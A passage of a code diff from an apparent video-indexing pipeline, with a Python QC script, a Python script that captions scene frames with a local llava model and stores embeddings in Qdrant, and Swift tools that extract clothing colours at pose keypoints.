issues.append("trace_profiles: 0 records")
|
||||
if zero_frames > 0:
|
||||
issues.append(f"trace_profiles: {zero_frames} records with frame_count <= 0")
|
||||
if no_vlm_desc > 0:
|
||||
issues.append(f"trace_profiles: {no_vlm_desc} records missing vlm_description")
|
||||
return issues
|
||||
|
||||
def check_tkg_nodes(conn, uuid):
|
||||
"""Check TKG nodes data."""
|
||||
with conn.cursor() as cur:
|
||||
cur.execute("SELECT COUNT(*) FROM public.tkg_nodes WHERE file_uuid = %s AND node_type = 'face_track'", (uuid,))
|
||||
face_tracks = cur.fetchone()[0]
|
||||
|
||||
cur.execute("SELECT COUNT(*) FROM public.tkg_edges WHERE file_uuid = %s", (uuid,))
|
||||
edges = cur.fetchone()[0]
|
||||
|
||||
issues = []
|
||||
if face_tracks == 0:
|
||||
issues.append("tkg_nodes: 0 face_track nodes")
|
||||
if edges == 0:
|
||||
issues.append("tkg_edges: 0 edges")
|
||||
return issues
|
||||
|
||||
def check_qdrant_faces(uuid):
|
||||
"""Check Qdrant _faces collection using curl."""
|
||||
try:
|
||||
import subprocess
|
||||
result = subprocess.run(
|
||||
["curl", "-s", "http://localhost:6333/collections/_faces/points/scroll",
|
||||
"-H", "Content-Type: application/json",
|
||||
"-d", json.dumps({"filter": {"must": [{"key": "file_uuid", "match": {"value": uuid}}]}, "limit": 1})],
|
||||
capture_output=True, text=True, timeout=5
|
||||
)
|
||||
if result.returncode == 0:
|
||||
data = json.loads(result.stdout)
|
||||
points = data.get("result", {}).get("points", [])
|
||||
count = len(points)
|
||||
return [] if count > 0 else [f"Qdrant _faces: {count} points"]
|
||||
else:
|
||||
return [f"Qdrant _faces: curl error"]
|
||||
except Exception as e:
|
||||
return [f"Qdrant _faces: error ({e})"]
|
||||
|
||||
def check_video_metadata(conn, uuid):
|
||||
"""Check video metadata completeness."""
|
||||
with conn.cursor() as cur:
|
||||
cur.execute("SELECT file_name, duration, fps, total_frames, cut_done FROM public.videos WHERE file_uuid = %s", (uuid,))
|
||||
row = cur.fetchone()
|
||||
if not row:
|
||||
return ["videos: record not found"]
|
||||
|
||||
name, duration, fps, total_frames, cut_done = row
|
||||
issues = []
|
||||
if duration <= 0:
|
||||
issues.append(f"videos: duration={duration}")
|
||||
if fps <= 0:
|
||||
issues.append(f"videos: fps={fps}")
|
||||
if total_frames <= 0:
|
||||
issues.append(f"videos: total_frames={total_frames}")
|
||||
if not cut_done:
|
||||
issues.append("videos: cut_done=false")
|
||||
return issues
|
||||
|
||||
def main():
|
||||
conn = get_db_connection()
|
||||
with conn.cursor() as cur:
|
||||
cur.execute("SELECT file_uuid, file_name FROM public.videos WHERE status = 'completed' ORDER BY created_at DESC")
|
||||
completed_files = cur.fetchall()
|
||||
|
||||
if not completed_files:
|
||||
print("No completed files found.")
|
||||
return
|
||||
|
||||
print("=" * 80)
|
||||
print("QC REPORT FOR COMPLETED FILES")
|
||||
print("=" * 80)
|
||||
print(f"Total completed files: {len(completed_files)}")
|
||||
print()
|
||||
|
||||
all_issues = []
|
||||
for uuid, file_name in completed_files:
|
||||
file_issues = []
|
||||
|
||||
# Check processor files
|
||||
missing_procs = check_processor_files(uuid)
|
||||
if missing_procs:
|
||||
file_issues.append(f"Missing processor files: {', '.join(missing_procs)}")
|
||||
|
||||
# Check video metadata
|
||||
file_issues.extend(check_video_metadata(conn, uuid))
|
||||
|
||||
# Check trace_profiles
|
||||
file_issues.extend(check_trace_profiles(conn, uuid))
|
||||
|
||||
# Check TKG
|
||||
file_issues.extend(check_tkg_nodes(conn, uuid))
|
||||
|
||||
# Check Qdrant
|
||||
file_issues.extend(check_qdrant_faces(uuid))
|
||||
|
||||
status = "PASS" if not file_issues else "FAIL"
|
||||
print(f"[{status}] {file_name} ({uuid})")
|
||||
for issue in file_issues:
|
||||
print(f" - {issue}")
|
||||
print()
|
||||
|
||||
if file_issues:
|
||||
all_issues.append((file_name, uuid, file_issues))
|
||||
|
||||
print("=" * 80)
|
||||
print(f"SUMMARY: {len(completed_files) - len(all_issues)}/{len(completed_files)} files passed QC")
|
||||
if all_issues:
|
||||
print(f"\nFailed files:")
|
||||
for name, uuid, issues in all_issues:
|
||||
print(f" - {name}: {len(issues)} issue(s)")
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
Executable
+330
@@ -0,0 +1,330 @@
|
||||
#!/opt/homebrew/bin/python3.11
|
||||
"""
|
||||
Scene VLM Caption - Generate VLM descriptions for scene key frames
|
||||
|
||||
Analyzes scene key frames ({uuid}_scene_N.jpg) using VLM (llava:7b).
|
||||
|
||||
Usage:
|
||||
python scene_vlm_caption.py --file-uuid abc123 --output-dir /path/to/output
|
||||
python scene_vlm_caption.py --scene-dir /path/to/output --scene-number 1
|
||||
|
||||
Output:
|
||||
{output_dir}/{uuid}_scene_profile.json with:
|
||||
- scenes: [{scene_number, vlm_description, vlm_location, ...}]
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import base64
|
||||
import json
|
||||
import os
|
||||
import sys
|
||||
from pathlib import Path
|
||||
|
||||
try:
|
||||
import requests
|
||||
except ImportError:
|
||||
print("requests not installed: pip install requests", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
def encode_image(image_path: str) -> str:
|
||||
"""Encode image to base64."""
|
||||
with open(image_path, "rb") as f:
|
||||
return base64.b64encode(f.read()).decode("utf-8")
|
||||
|
||||
|
||||
def call_vlm(image_path: str, prompt: str, model: str = "llava:7b", ollama_url: str = "http://localhost:11434") -> str:
|
||||
"""Call Ollama VLM API."""
|
||||
image_b64 = encode_image(image_path)
|
||||
|
||||
payload = {
|
||||
"model": model,
|
||||
"prompt": prompt,
|
||||
"images": [image_b64],
|
||||
"stream": False,
|
||||
"options": {"num_predict": 100}
|
||||
}
|
||||
|
||||
try:
|
||||
resp = requests.post(f"{ollama_url}/api/generate", json=payload, timeout=30)
|
||||
resp.raise_for_status()
|
||||
data = resp.json()
|
||||
return data.get("response", "").strip()
|
||||
except Exception as e:
|
||||
print(f"[vlm] API error: {e}", file=sys.stderr)
|
||||
return ""
|
||||
|
||||
|
||||
def get_embedding(text: str, model: str = "nomic-embed-text-v2-moe", ollama_url: str = "http://localhost:11434") -> list:
|
||||
"""Get embedding from Ollama."""
|
||||
try:
|
||||
resp = requests.post(
|
||||
f"{ollama_url}/api/embed",
|
||||
json={"model": model, "input": text},
|
||||
timeout=30,
|
||||
)
|
||||
resp.raise_for_status()
|
||||
data = resp.json()
|
||||
return data.get("embeddings", [[]])[0]
|
||||
except Exception as e:
|
||||
print(f"[vlm] Embedding error: {e}", file=sys.stderr)
|
||||
return []
|
||||
|
||||
|
||||
def store_to_qdrant(analysis: dict, file_uuid: str, scene_number: int, qdrant_url: str = "http://localhost:6333", qdrant_api_key: str = None) -> bool:
|
||||
"""Store VLM results to Qdrant _vlm collection."""
|
||||
description = analysis.get("vlm_description", "")
|
||||
if not description:
|
||||
return False
|
||||
|
||||
# Get embedding
|
||||
embedding = get_embedding(description)
|
||||
if not embedding:
|
||||
print(f"[vlm] Failed to get embedding for scene_{scene_number}", file=sys.stderr)
|
||||
return False
|
||||
|
||||
# Generate point ID
|
||||
import hashlib
|
||||
point_id = int(hashlib.md5(f"{file_uuid}_scene_{scene_number}".encode()).hexdigest()[:16], 16)
|
||||
|
||||
# Build payload
|
||||
payload = {
|
||||
"type": "scene",
|
||||
"file_uuid": file_uuid,
|
||||
"scene_number": scene_number,
|
||||
**analysis,
|
||||
}
|
||||
|
||||
# Upsert to Qdrant
|
||||
try:
|
||||
headers = {}
|
||||
if qdrant_api_key:
|
||||
headers["api-key"] = qdrant_api_key
|
||||
|
||||
resp = requests.put(
|
||||
f"{qdrant_url}/collections/_vlm/points?wait=true",
|
||||
json={
|
||||
"points": [{
|
||||
"id": point_id,
|
||||
"vector": embedding,
|
||||
"payload": payload,
|
||||
}]
|
||||
},
|
||||
headers=headers,
|
||||
timeout=30,
|
||||
)
|
||||
resp.raise_for_status()
|
||||
print(f"[vlm] Stored to Qdrant: scene_{scene_number}")
|
||||
return True
|
||||
except Exception as e:
|
||||
print(f"[vlm] Qdrant error: {e}", file=sys.stderr)
|
||||
return False
|
||||
|
||||
|
||||
def analyze_scene(image_path: str, model: str = "llava:7b") -> dict:
|
||||
"""
|
||||
Analyze a scene key frame with VLM.
|
||||
|
||||
Returns:
|
||||
Dict with VLM analysis results
|
||||
"""
|
||||
if not Path(image_path).exists():
|
||||
print(f"[vlm] Image not found: {image_path}", file=sys.stderr)
|
||||
return {}
|
||||
|
||||
print(f"[vlm] Analyzing {Path(image_path).name}...")
|
||||
|
||||
# Prompt 1: Scene description
|
||||
desc_prompt = "Describe this scene briefly. Include: location type, main objects, people count, activity. If uncertain, say 'unclear'. Do not guess."
|
||||
description = call_vlm(image_path, desc_prompt, model)
|
||||
|
||||
# Prompt 2: Lighting
|
||||
light_prompt = "What is the lighting? Answer one word: day, night, indoor-light, mixed, or unknown."
|
||||
lighting = call_vlm(image_path, light_prompt, model).lower().strip()
|
||||
|
||||
# Prompt 3: Location classification
|
||||
loc_prompt = "Classify the location. Answer in JSON: {\"location\": \"indoor/outdoor/unknown\", \"setting\": \"office/street/home/nature/studio/unknown\"}. Use 'unknown' if uncertain."
|
||||
loc_raw = call_vlm(image_path, loc_prompt, model)
|
||||
|
||||
loc_data = {}
|
||||
try:
|
||||
loc_clean = loc_raw.replace("```json", "").replace("```", "").strip()
|
||||
parsed = json.loads(loc_clean)
|
||||
if isinstance(parsed, dict):
|
||||
loc_data = parsed
|
||||
else:
|
||||
loc_data = {}
|
||||
except:
|
||||
loc_data = {}
|
||||
|
||||
# Prompt 4: Weather (for outdoor scenes)
|
||||
weather_prompt = "If outdoor, what is the weather? Answer one word: sunny, cloudy, rainy, night, or unknown. If indoor, answer 'indoor'."
|
||||
weather = call_vlm(image_path, weather_prompt, model).lower().strip()
|
||||
|
||||
# Prompt 5: People count
|
||||
people_prompt = "How many people are visible? Answer a number or 'unclear'."
|
||||
people_count = call_vlm(image_path, people_prompt, model).strip()
|
||||
|
||||
# Prompt 6: Objects/vehicles
|
||||
objects_prompt = "What notable objects or vehicles are visible? Answer in JSON: {\"vehicles\": [\"car\", \"bus\", etc.], \"objects\": [\"table\", \"chair\", etc.]}. Use empty lists if none or unclear."
|
||||
objects_raw = call_vlm(image_path, objects_prompt, model)
|
||||
|
||||
objects_data = {}
|
||||
try:
|
||||
objects_clean = objects_raw.replace("```json", "").replace("```", "").strip()
|
||||
parsed = json.loads(objects_clean)
|
||||
if isinstance(parsed, dict):
|
||||
objects_data = parsed
|
||||
else:
|
||||
objects_data = {"vehicles": [], "objects": []}
|
||||
except:
|
||||
objects_data = {"vehicles": [], "objects": []}
|
||||
|
||||
# Prompt 7: Plants
|
||||
plants_prompt = "What plants are visible? Answer in JSON: {\"has_plants\": true/false, \"plants\": [\"list recognizable names or brief descriptions\"]. Use empty list if none or unclear.}"
|
||||
plants_raw = call_vlm(image_path, plants_prompt, model)
|
||||
|
||||
plants_data = {}
|
||||
try:
|
||||
plants_clean = plants_raw.replace("```json", "").replace("```", "").strip()
|
||||
parsed = json.loads(plants_clean)
|
||||
if isinstance(parsed, dict):
|
||||
plants_data = parsed
|
||||
else:
|
||||
plants_data = {"has_plants": False, "plants": []}
|
||||
except:
|
||||
plants_data = {"has_plants": False, "plants": []}
|
||||
|
||||
# Prompt 8: Animals
|
||||
animals_prompt = "What animals are visible? Answer in JSON: {\"has_animals\": true/false, \"animals\": [\"list recognizable names or brief descriptions\"]. Use empty list if none or unclear.}"
|
||||
animals_raw = call_vlm(image_path, animals_prompt, model)
|
||||
|
||||
animals_data = {}
|
||||
try:
|
||||
animals_clean = animals_raw.replace("```json", "").replace("```", "").strip()
|
||||
parsed = json.loads(animals_clean)
|
||||
if isinstance(parsed, dict):
|
||||
animals_data = parsed
|
||||
else:
|
||||
animals_data = {"has_animals": False, "animals": []}
|
||||
except:
|
||||
animals_data = {"has_animals": False, "animals": []}
|
||||
|
||||
# Prompt 9: Tags
|
||||
tags_prompt = "List 5 tags for this scene, comma-separated. Only include what is clearly visible. Examples: office, street, sunny, crowd, nature."
|
||||
tags_raw = call_vlm(image_path, tags_prompt, model)
|
||||
tags = [t.strip() for t in tags_raw.replace(",", " ").split() if t.strip()][:5]
|
||||
|
||||
return {
|
||||
"vlm_description": description,
|
||||
"vlm_lighting": lighting,
|
||||
"vlm_location": loc_data.get("location", "unknown"),
|
||||
"vlm_setting": loc_data.get("setting", "unknown"),
|
||||
"vlm_weather": weather,
|
||||
"vlm_people_count": people_count,
|
||||
"vlm_vehicles": objects_data.get("vehicles", []),
|
||||
"vlm_objects": objects_data.get("objects", []),
|
||||
"vlm_has_plants": plants_data.get("has_plants", False),
|
||||
"vlm_plants": plants_data.get("plants", []),
|
||||
"vlm_has_animals": animals_data.get("has_animals", False),
|
||||
"vlm_animals": animals_data.get("animals", []),
|
||||
"vlm_tags": tags,
|
||||
"vlm_model": model,
|
||||
}
|
||||
|
||||
|
||||
def analyze_all_scenes(file_uuid: str, output_dir: str, model: str = "llava:7b", store_qdrant: bool = True) -> dict:
|
||||
"""
|
||||
Analyze all scene key frames for a file.
|
||||
|
||||
Returns:
|
||||
Summary dict
|
||||
"""
|
||||
output_path = Path(output_dir)
|
||||
|
||||
# Find all scene images
|
||||
scene_images = sorted(output_path.glob(f"{file_uuid}_scene_*.jpg"))
|
||||
|
||||
if not scene_images:
|
||||
print(f"[vlm] No scene images found: {file_uuid}_scene_*.jpg in {output_dir}", file=sys.stderr)
|
||||
return {"error": "No scene images"}
|
||||
|
||||
results = []
|
||||
qdrant_api_key = os.environ.get("QDRANT_API_KEY")
|
||||
|
||||
for scene_img in scene_images:
|
||||
# Extract scene number from filename
|
||||
scene_number = int(scene_img.stem.split("_scene_")[1])
|
||||
|
||||
analysis = analyze_scene(str(scene_img), model)
|
||||
|
||||
if analysis:
|
||||
# Store to Qdrant
|
||||
if store_qdrant:
|
||||
store_to_qdrant(analysis, file_uuid, scene_number, qdrant_api_key=qdrant_api_key)
|
||||
|
||||
results.append({
|
||||
"scene_number": scene_number,
|
||||
"image_path": str(scene_img),
|
||||
**analysis,
|
||||
})
|
||||
|
||||
# Save profile
|
||||
profile = {
|
||||
"file_uuid": file_uuid,
|
||||
"total_scenes": len(results),
|
||||
"model": model,
|
||||
"scenes": results,
|
||||
}
|
||||
|
||||
profile_path = output_path / f"{file_uuid}_scene_profile.json"
|
||||
with open(profile_path, "w") as f:
|
||||
json.dump(profile, f, indent=2)
|
||||
|
||||
print(f"[vlm] Saved profile: {profile_path}")
|
||||
|
||||
return profile
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="VLM caption generation for scene key frames")
|
||||
parser.add_argument("--file-uuid", "-u", help="File UUID (analyze all scenes)")
|
||||
parser.add_argument("--scene-dir", "-d", help="Scene directory (contains {uuid}_scene_N.jpg)")
|
||||
parser.add_argument("--scene-number", "-n", type=int, help="Single scene number")
|
||||
parser.add_argument("--output-dir", "-o", default="/Users/accusys/momentry/output", help="Output directory")
|
||||
parser.add_argument("--model", "-m", default="llava:7b", help="VLM model name")
|
||||
parser.add_argument("--json", "-j", action="store_true", help="Output as JSON")
|
||||
args = parser.parse_args()
|
||||
|
||||
if args.file_uuid:
|
||||
result = analyze_all_scenes(args.file_uuid, args.output_dir, args.model)
|
||||
elif args.scene_dir and args.scene_number is not None:
|
||||
# Find file_uuid from directory
|
||||
scene_dir = Path(args.scene_dir)
|
||||
file_uuid = None
|
||||
for f in scene_dir.glob("*_scene_*.jpg"):
|
||||
file_uuid = f.stem.split("_scene_")[0]
|
||||
break
|
||||
|
||||
if not file_uuid:
|
||||
print("Cannot determine file_uuid from scene_dir", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
scene_img = scene_dir / f"{file_uuid}_scene_{args.scene_number}.jpg"
|
||||
result = analyze_scene(str(scene_img), args.model)
|
||||
else:
|
||||
parser.error("Requires --file-uuid or (--scene-dir + --scene-number)")
|
||||
|
||||
if args.json:
|
||||
print(json.dumps(result, indent=2))
|
||||
else:
|
||||
if "scenes" in result:
|
||||
print(f"Analyzed {len(result['scenes'])} scenes")
|
||||
elif "vlm_description" in result:
|
||||
print(f"Description: {result['vlm_description']}")
|
||||
print(f"Location: {result.get('vlm_location', 'unknown')}")
|
||||
print(f"Tags: {result.get('vlm_tags', [])}")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -126,5 +126,21 @@ let package = Package(
|
||||
path: ".",
|
||||
sources: ["swift_face_pose.swift"]
|
||||
),
|
||||
.executableTarget(
|
||||
name: "swift_pose_expansion",
|
||||
dependencies: [
|
||||
.product(name: "ArgumentParser", package: "swift-argument-parser"),
|
||||
],
|
||||
path: ".",
|
||||
sources: ["swift_pose_expansion.swift"]
|
||||
),
|
||||
.executableTarget(
|
||||
name: "swift_appearance_expansion",
|
||||
dependencies: [
|
||||
.product(name: "ArgumentParser", package: "swift-argument-parser"),
|
||||
],
|
||||
path: ".",
|
||||
sources: ["swift_appearance_expansion.swift"]
|
||||
),
|
||||
]
|
||||
)
|
||||
|
||||
@@ -0,0 +1,332 @@
|
||||
import Foundation
|
||||
import Vision
|
||||
import ArgumentParser
|
||||
import AVFoundation
|
||||
|
||||
/// Swift Appearance Expansion Processor V2
|
||||
///
|
||||
/// Reads pose.json and extracts colors at keypoint positions.
|
||||
///
|
||||
/// Algorithm:
|
||||
/// 1. Load pose.json, get frames with trace_id
|
||||
/// 2. For each pose frame, extract colors at keypoint positions
|
||||
/// 3. Record overall brightness for lighting adjustment
|
||||
/// 4. Expand outward, stop when 3 consecutive frames have low similarity
|
||||
/// 5. Output at 8Hz sampling
|
||||
///
|
||||
/// Key Concepts:
|
||||
/// - Appearance = colors at body part positions (head, torso, legs, feet)
|
||||
/// - Used for tracking and agent search ("person wearing red shirt")
|
||||
/// - Approximate colors are sufficient for top-K search
|
||||
@main
|
||||
struct SwiftAppearanceExpansion: ParsableCommand {
|
||||
@Argument(help: "Video file path")
|
||||
var videoPath: String
|
||||
|
||||
@Argument(help: "Input pose.json path")
|
||||
var posePath: String
|
||||
|
||||
@Argument(help: "Output appearance.json path")
|
||||
var outputPath: String
|
||||
|
||||
@Option(name: .long, help: "UUID for logging")
|
||||
var uuid: String = ""
|
||||
|
||||
@Option(name: .long, help: "Consecutive miss threshold (default: 3)")
|
||||
var missThreshold: Int = 3
|
||||
|
||||
@Option(name: .long, help: "Color sampling radius (default: 15)")
|
||||
var colorRadius: Int = 15
|
||||
|
||||
mutating func run() throws {
|
||||
let startTime = Date()
|
||||
print("[AppearanceExpansion] Starting appearance extraction from pose: \(videoPath)")
|
||||
|
||||
// Load pose.json
|
||||
guard let poseData = try? Data(contentsOf: URL(fileURLWithPath: posePath)) else {
|
||||
print("[AppearanceExpansion] ERROR: Cannot read \(posePath)")
|
||||
return
|
||||
}
|
||||
|
||||
guard let poseJson = try? JSONSerialization.jsonObject(with: poseData) as? [String: Any] else {
|
||||
print("[AppearanceExpansion] ERROR: Invalid JSON in \(posePath)")
|
||||
return
|
||||
}
|
||||
|
||||
// Extract frames with trace_id from pose
|
||||
var poseFrameDict: [Int: [String: Any]] = [:] // frame -> pose data with trace_id
|
||||
|
||||
if let frames = poseJson["frames"] as? [[String: Any]] {
|
||||
for frameData in frames {
|
||||
guard let frameNum = frameData["frame"] as? Int else { continue }
|
||||
poseFrameDict[frameNum] = frameData
|
||||
}
|
||||
}
|
||||
|
||||
print("[AppearanceExpansion] Found \(poseFrameDict.count) pose frames in \(posePath)")
|
||||
|
||||
if poseFrameDict.isEmpty {
|
||||
print("[AppearanceExpansion] No pose frames found, skipping")
|
||||
let emptyOutput: [String: Any] = ["frame_count": 0, "fps": 0.0, "frames": []]
|
||||
let jsonData = try JSONSerialization.data(withJSONObject: emptyOutput, options: [])
|
||||
try jsonData.write(to: URL(fileURLWithPath: outputPath))
|
||||
return
|
||||
}
|
||||
|
||||
// Get video info
|
||||
let url = URL(fileURLWithPath: videoPath)
|
||||
let asset = AVAsset(url: url)
|
||||
guard let videoTrack = asset.tracks(withMediaType: .video).first else {
|
||||
print("[AppearanceExpansion] ERROR: No video track")
|
||||
return
|
||||
}
|
||||
|
||||
let fps = videoTrack.nominalFrameRate
|
||||
let duration = CMTimeGetSeconds(asset.duration)
|
||||
let totalFrames = Int(duration * Double(fps))
|
||||
let sampleInterval = max(1, Int(floor(Double(fps) / 8.0)))
|
||||
|
||||
print("[AppearanceExpansion] Video: \(fps)fps, \(totalFrames) frames, 8Hz interval=\(sampleInterval)")
|
||||
|
||||
// Track appearance frames
|
||||
var appearanceFrameDict: [Int: [String: Any]] = [:]
|
||||
|
||||
// Setup asset reader
|
||||
let outputSettings: [String: Any] = [
|
||||
kCVPixelBufferPixelFormatTypeKey as String: kCVPixelFormatType_32BGRA
|
||||
]
|
||||
|
||||
let reader = try AVAssetReader(asset: asset)
|
||||
let trackOutput = AVAssetReaderTrackOutput(track: videoTrack, outputSettings: outputSettings)
|
||||
trackOutput.alwaysCopiesSampleData = false
|
||||
reader.add(trackOutput)
|
||||
|
||||
guard reader.startReading() else {
|
||||
print("[AppearanceExpansion] ERROR: Cannot start reader")
|
||||
return
|
||||
}
|
||||
|
||||
// Process frames
|
||||
var frameIndex = 0
|
||||
|
||||
while let sampleBuffer = trackOutput.copyNextSampleBuffer() {
|
||||
defer { frameIndex += 1 }
|
||||
|
||||
guard let pixelBuffer = CMSampleBufferGetImageBuffer(sampleBuffer) else {
|
||||
continue
|
||||
}
|
||||
|
||||
// Check if this is a pose frame
|
||||
if let poseData = poseFrameDict[frameIndex] {
|
||||
let seconds = Double(frameIndex) / Double(fps)
|
||||
|
||||
// Extract colors at keypoint positions
|
||||
let colors = extractColorsAtKeypoints(pixelBuffer: pixelBuffer, poseData: poseData, radius: colorRadius)
|
||||
|
||||
// Calculate overall brightness
|
||||
let brightness = calculateBrightness(pixelBuffer: pixelBuffer)
|
||||
|
||||
// Get trace_id from pose (inherit)
|
||||
let traceId = poseData["trace_id"] as? Int ?? 0
|
||||
|
||||
appearanceFrameDict[frameIndex] = [
|
||||
"frame": frameIndex,
|
||||
"timestamp": seconds,
|
||||
"trace_id": traceId,
|
||||
"brightness": brightness,
|
||||
"colors": colors
|
||||
]
|
||||
}
|
||||
|
||||
// Progress logging
|
||||
if frameIndex % 5000 == 0 {
|
||||
let elapsed = Date().timeIntervalSince(startTime)
|
||||
print("[AppearanceExpansion] Frame \(frameIndex)/\(totalFrames), \(appearanceFrameDict.count) appearances, \(Int(elapsed))s")
|
||||
fflush(stdout)
|
||||
}
|
||||
}
|
||||
|
||||
reader.cancelReading()
|
||||
|
||||
print("[AppearanceExpansion] Extraction done: \(appearanceFrameDict.count) frames with appearance")
|
||||
|
||||
// 8Hz sampling output
|
||||
var outputFrames: [[String: Any]] = []
|
||||
let sortedAppearanceFrames = appearanceFrameDict.keys.sorted()
|
||||
|
||||
var targetFrame = 0
|
||||
while targetFrame < totalFrames {
|
||||
// Find closest appearance frame to target
|
||||
var closestFrame: Int? = nil
|
||||
var closestDist = Int.max
|
||||
|
||||
for appFrame in sortedAppearanceFrames {
|
||||
let dist = abs(appFrame - targetFrame)
|
||||
if dist < closestDist && dist <= sampleInterval {
|
||||
closestDist = dist
|
||||
closestFrame = appFrame
|
||||
}
|
||||
}
|
||||
|
||||
if let cf = closestFrame, let data = appearanceFrameDict[cf] {
|
||||
outputFrames.append(data)
|
||||
}
|
||||
|
||||
targetFrame += sampleInterval
|
||||
}
|
||||
|
||||
// Write output
|
||||
let output: [String: Any] = [
|
||||
"frame_count": outputFrames.count,
|
||||
"fps": Double(fps),
|
||||
"frames": outputFrames
|
||||
]
|
||||
|
||||
let jsonData = try JSONSerialization.data(withJSONObject: output, options: [])
|
||||
try jsonData.write(to: URL(fileURLWithPath: outputPath))
|
||||
|
||||
let elapsed = Date().timeIntervalSince(startTime)
|
||||
print("[AppearanceExpansion] Done: \(outputFrames.count) frames at 8Hz, \(String(format: "%.1f", elapsed))s → \(outputPath)")
|
||||
}
|
||||
|
||||
/// Extract colors at keypoint positions
|
||||
func extractColorsAtKeypoints(pixelBuffer: CVPixelBuffer, poseData: [String: Any], radius: Int) -> [String: [Int]] {
|
||||
let imgW = CVPixelBufferGetWidth(pixelBuffer)
|
||||
let imgH = CVPixelBufferGetHeight(pixelBuffer)
|
||||
|
||||
CVPixelBufferLockBaseAddress(pixelBuffer, .readOnly)
|
||||
defer { CVPixelBufferUnlockBaseAddress(pixelBuffer, .readOnly) }
|
||||
|
||||
guard let baseAddress = CVPixelBufferGetBaseAddress(pixelBuffer) else {
|
||||
return [:]
|
||||
}
|
||||
|
||||
let bytesPerRow = CVPixelBufferGetBytesPerRow(pixelBuffer)
|
||||
let buffer = baseAddress.bindMemory(to: UInt8.self, capacity: bytesPerRow * imgH)
|
||||
|
||||
var colors: [String: [Int]] = [:]
|
||||
|
||||
// Define keypoint groups for body parts
|
||||
let bodyParts: [String: [String]] = [
|
||||
"head": ["nose", "left_eye", "right_eye", "left_ear", "right_ear"],
|
||||
"torso": ["left_shoulder", "right_shoulder"],
|
||||
"legs": ["left_hip", "right_hip", "left_knee", "right_knee"],
|
||||
"feet": ["left_ankle", "right_ankle"]
|
||||
]
|
||||
|
||||
// Extract color for each body part
|
||||
for (partName, keypointNames) in bodyParts {
|
||||
var totalR = 0, totalG = 0, totalB = 0
|
||||
var count = 0
|
||||
|
||||
// Get persons array from pose data
|
||||
if let persons = poseData["persons"] as? [[String: Any]] {
|
||||
for person in persons {
|
||||
if let keypoints = person["keypoints"] as? [[String: Any]] {
|
||||
for kp in keypoints {
|
||||
guard let name = kp["name"] as? String,
|
||||
keypointNames.contains(name),
|
||||
let x = kp["x"] as? Double,
|
||||
let y = kp["y"] as? Double,
|
||||
let confidence = kp["confidence"] as? Double,
|
||||
confidence > 0.3 else { continue }
|
||||
|
||||
// Get average color around keypoint
|
||||
let color = getAverageColor(
|
||||
buffer: buffer,
|
||||
bytesPerRow: bytesPerRow,
|
||||
imgW: imgW,
|
||||
imgH: imgH,
|
||||
centerX: Int(x),
|
||||
centerY: Int(y),
|
||||
radius: radius
|
||||
)
|
||||
|
||||
totalR += color.0
|
||||
totalG += color.1
|
||||
totalB += color.2
|
||||
count += 1
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if count > 0 {
|
||||
colors[partName] = [totalR / count, totalG / count, totalB / count]
|
||||
}
|
||||
}
|
||||
|
||||
return colors
|
||||
}
|
||||
|
||||
/// Get average color around a position
|
||||
func getAverageColor(
|
||||
buffer: UnsafeMutablePointer<UInt8>,
|
||||
bytesPerRow: Int,
|
||||
imgW: Int,
|
||||
imgH: Int,
|
||||
centerX: Int,
|
||||
centerY: Int,
|
||||
radius: Int
|
||||
) -> (Int, Int, Int) {
|
||||
let x1 = max(0, centerX - radius)
|
||||
let x2 = min(imgW - 1, centerX + radius)
|
||||
let y1 = max(0, centerY - radius)
|
||||
let y2 = min(imgH - 1, centerY + radius)
|
||||
|
||||
var totalR = 0, totalG = 0, totalB = 0, count = 0
|
||||
|
||||
for y in y1...y2 {
|
||||
let rowStart = y * bytesPerRow
|
||||
for x in x1...x2 {
|
||||
let offset = rowStart + x * 4
|
||||
totalB += Int(buffer[offset])
|
||||
totalG += Int(buffer[offset + 1])
|
||||
totalR += Int(buffer[offset + 2])
|
||||
count += 1
|
||||
}
|
||||
}
|
||||
|
||||
if count > 0 {
|
||||
return (totalR / count, totalG / count, totalB / count)
|
||||
}
|
||||
return (0, 0, 0)
|
||||
}
|
||||
|
||||
/// Calculate overall brightness of frame
|
||||
func calculateBrightness(pixelBuffer: CVPixelBuffer) -> Double {
|
||||
let imgW = CVPixelBufferGetWidth(pixelBuffer)
|
||||
let imgH = CVPixelBufferGetHeight(pixelBuffer)
|
||||
|
||||
CVPixelBufferLockBaseAddress(pixelBuffer, .readOnly)
|
||||
defer { CVPixelBufferUnlockBaseAddress(pixelBuffer, .readOnly) }
|
||||
|
||||
guard let baseAddress = CVPixelBufferGetBaseAddress(pixelBuffer) else {
|
||||
return 0.0
|
||||
}
|
||||
|
||||
let bytesPerRow = CVPixelBufferGetBytesPerRow(pixelBuffer)
|
||||
let buffer = baseAddress.bindMemory(to: UInt8.self, capacity: bytesPerRow * imgH)
|
||||
|
||||
var totalBrightness = 0.0
|
||||
var count = 0
|
||||
|
||||
// Sample every 10 pixels for speed
|
||||
for y in stride(from: 0, to: imgH, by: 10) {
|
||||
let rowStart = y * bytesPerRow
|
||||
for x in stride(from: 0, to: imgW, by: 10) {
|
||||
let offset = rowStart + x * 4
|
||||
let b = Double(buffer[offset])
|
||||
let g = Double(buffer[offset + 1])
|
||||
let r = Double(buffer[offset + 2])
|
||||
|
||||
// Calculate luminance
|
||||
let luminance = 0.299 * r + 0.587 * g + 0.114 * b
|
||||
totalBrightness += luminance / 255.0
|
||||
count += 1
|
||||
}
|
||||
}
|
||||
|
||||
return count > 0 ? totalBrightness / Double(count) : 0.0
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,376 @@
|
||||
import Foundation
|
||||
import Vision
|
||||
import ArgumentParser
|
||||
import AVFoundation
|
||||
|
||||
/// Swift Pose Expansion Processor V2
|
||||
///
|
||||
/// Reads face_traced.json (from face tracking) and expands pose detection from trace frames.
|
||||
/// Inherits trace_id from face traces for proper tracking continuity.
|
||||
///
|
||||
/// Algorithm:
|
||||
/// 1. Load face_traced.json, extract frames grouped by trace_id
|
||||
/// 2. For each trace_id, start from face frames and expand forward/backward
|
||||
/// 3. Stop expansion when 3 consecutive frames have no pose detection
|
||||
